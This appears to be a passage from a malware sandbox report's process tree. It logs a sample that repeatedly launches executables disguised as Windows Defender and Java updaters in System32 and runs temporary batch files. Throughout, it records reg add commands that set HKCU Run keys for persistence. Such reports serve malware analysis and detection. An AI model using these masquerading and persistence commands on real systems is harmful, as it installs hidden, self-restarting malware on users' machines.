        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        94⤵
        
        PID:3912
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        93⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2408
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        93⤵
        
        PID:2748
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\83A1.tmp\83A2.tmp\83B3.bat C:\Windows\system32\java.exe"
        94⤵
        Drops file in System32 directory
        
        PID:3712
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        95⤵
        
        PID:1196
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        95⤵
        Adds Run key to start application
        
        PID:2932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        95⤵
        
        PID:3540
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        95⤵
        
        PID:2472
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        95⤵
        Adds Run key to start application
        
        PID:3228
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        95⤵
        
        PID:3300
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        96⤵
        
        PID:4076
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        95⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3608
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        95⤵
        
        PID:3432
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8778.tmp\8779.tmp\877A.bat C:\Windows\system32\java.exe"
        96⤵
        
        PID:4000
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        97⤵
        Delays execution with timeout.exe
        
        PID:4036
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        97⤵
        
        PID:3600
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        97⤵
        
        PID:3544
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        97⤵
        
        PID:3668
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        97⤵
        
        PID:1544
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        97⤵
        
        PID:3420
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        98⤵
        
        PID:3156
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        97⤵
        
        PID:3828
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        97⤵
        
        PID:2408
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8B6E.tmp\8B6F.tmp\8B70.bat C:\Windows\system32\java.exe"
        98⤵
        Drops file in System32 directory
        
        PID:2244
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        99⤵
        Delays execution with timeout.exe
        
        PID:3136
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        99⤵
        
        PID:3876
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        99⤵
        
        PID:2144
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        99⤵
        
        PID:3880
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        99⤵
        Adds Run key to start application
        
        PID:3560
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        99⤵
        
        PID:3516
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        100⤵
        
        PID:344
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        99⤵
        
        PID:3936
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        99⤵
        
        PID:3632
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8F35.tmp\8F36.tmp\8F37.bat C:\Windows\system32\java.exe"
        100⤵
        
        PID:3604
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        101⤵
        
        PID:3100
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        101⤵
        
        PID:3992
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        101⤵
        
        PID:3288
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        101⤵
        
        PID:1624
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        101⤵
        
        PID:3228
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        101⤵
        
        PID:2472
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        102⤵
        
        PID:1048
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        101⤵
        
        PID:3576
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        101⤵
        
        PID:3384
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\931B.tmp\931C.tmp\931D.bat C:\Windows\system32\java.exe"
        102⤵
        
        PID:2348
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        103⤵
        Delays execution with timeout.exe
        
        PID:2544
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        103⤵
        Adds Run key to start application
        
        PID:3232
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        103⤵
        
        PID:2608
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        103⤵
        
        PID:2540
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        103⤵
        Adds Run key to start application
        
        PID:2196
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        103⤵
        
        PID:2248
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        104⤵
        
        PID:1680
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        103⤵
        
        PID:3452
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        103⤵
        
        PID:4064
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9750.tmp\9751.tmp\9752.bat C:\Windows\system32\java.exe"
        104⤵
        
        PID:3756
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        105⤵
        
        PID:3496
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        105⤵
        
        PID:3196
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        105⤵
        Adds Run key to start application
        
        PID:3180
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        105⤵
        
        PID:3892
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        105⤵
        
        PID:1972
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        105⤵
        
        PID:3132
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        106⤵
        
        PID:3480
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        105⤵
        
        PID:3520
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        105⤵
        
        PID:3456
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9B17.tmp\9B18.tmp\9B19.bat C:\Windows\system32\java.exe"
        106⤵
        Drops file in System32 directory
        
        PID:3224
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        107⤵
        
        PID:3228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        107⤵
        
        PID:3992
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        107⤵
        
        PID:992
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        107⤵
        Adds Run key to start application
        
        PID:4088
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        107⤵
        
        PID:1504
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        107⤵
        
        PID:3216
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        108⤵
        
        PID:1576
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        107⤵
        
        PID:3336
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        107⤵
        
        PID:3700
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9EDE.tmp\9EDF.tmp\9EE0.bat C:\Windows\system32\java.exe"
        108⤵
        
        PID:3284
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        109⤵
        Delays execution with timeout.exe
        
        PID:3612
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        109⤵
        
        PID:2372
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        109⤵
        
        PID:4036
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        109⤵
        
        PID:1436
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        109⤵
        
        PID:624
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        109⤵
        
        PID:3732
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        110⤵
        
        PID:3400
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        109⤵
        
        PID:3904
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        109⤵
        
        PID:2720
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A303.tmp\A304.tmp\A305.bat C:\Windows\system32\java.exe"
        110⤵
        Drops file in System32 directory
        
        PID:3596
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        111⤵
        
        PID:1432
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        111⤵
        
        PID:3820
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        111⤵
        
        PID:2196
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        111⤵
        
        PID:2916
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        111⤵
        
        PID:1980
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        111⤵
        
        PID:3232
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        112⤵
        
        PID:3892
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        111⤵
        
        PID:3668
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        111⤵
        
        PID:2144
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A6F9.tmp\A6FA.tmp\A6FB.bat C:\Windows\system32\java.exe"
        112⤵
        Drops file in System32 directory
        
        PID:3992
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        113⤵
        
        PID:3180
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        113⤵
        
        PID:3540
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        113⤵
        
        PID:1980
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        113⤵
        
        PID:560
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        113⤵
        Adds Run key to start application
        
        PID:916
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        113⤵
        
        PID:3264
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        114⤵
        
        PID:3888
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        113⤵
        
        PID:3604
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        113⤵
        
        PID:3632
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AA91.tmp\AA92.tmp\AA93.bat C:\Windows\system32\java.exe"
        114⤵
        
        PID:4000
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        115⤵
        
        PID:2544
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        115⤵
        
        PID:2296
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        115⤵
        
        PID:2260
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        115⤵
        
        PID:3904
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        115⤵
        
        PID:1300
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        115⤵
        
        PID:1432
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        116⤵
        
        PID:2888
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        115⤵
        
        PID:2676
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        115⤵
        
        PID:3124
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AE97.tmp\AE98.tmp\AE99.bat C:\Windows\system32\java.exe"
        116⤵
        Drops file in System32 directory
        
        PID:3296
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        117⤵
        
        PID:3572
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        117⤵
        
        PID:1624
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        117⤵
        
        PID:2276
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        117⤵
        Adds Run key to start application
        
        PID:2844
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        117⤵
        
        PID:3424
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        117⤵
        
        PID:3004
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        118⤵
        
        PID:1908
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        117⤵
        
        PID:3320
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        117⤵
        
        PID:3900
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B2CB.tmp\B2CC.tmp\B2CD.bat C:\Windows\system32\java.exe"
        118⤵
        Drops file in System32 directory
        
        PID:3668
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        119⤵
        
        PID:3540
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        119⤵
        
        PID:3172
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        119⤵
        
        PID:3572
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        119⤵
        Adds Run key to start application
        
        PID:1624
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        119⤵
        
        PID:2276
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        119⤵
        
        PID:2844
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        120⤵
        
        PID:3496
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        119⤵
        
        PID:3424
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        119⤵
        
        PID:2576
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B635.tmp\B636.tmp\B637.bat C:\Windows\system32\java.exe"
        120⤵
        
        PID:2556
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        121⤵
        Delays execution with timeout.exe
        
        PID:3524
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        121⤵
        
        PID:1624
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        121⤵
        
        PID:2276
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        121⤵
        
        PID:3644
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        121⤵
        Adds Run key to start application
        
        PID:3196
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        121⤵
        
        PID:1540
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        122⤵
        
        PID:4012
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        121⤵
        
        PID:3284
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        121⤵
        
        PID:3760
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BA89.tmp\BA8A.tmp\BA8B.bat C:\Windows\system32\java.exe"
        122⤵
        Drops file in System32 directory
        
        PID:900
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        123⤵
        
        PID:3976
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        123⤵
        
        PID:3528
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        123⤵
        
        PID:3544
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        123⤵
        
        PID:4064
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        123⤵
        
        PID:1436
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        123⤵
        
        PID:3612
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        124⤵
        
        PID:4028
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        123⤵
        
        PID:2408
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        123⤵
        
        PID:2952
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BE5F.tmp\BE60.tmp\BE61.bat C:\Windows\system32\java.exe"
        124⤵
        Drops file in System32 directory
        
        PID:3560
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        125⤵
        
        PID:3440
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        125⤵
        
        PID:3304
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        125⤵
        
        PID:1188
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        125⤵
        
        PID:3108
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        125⤵
        
        PID:3712
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        125⤵
        
        PID:1648
        
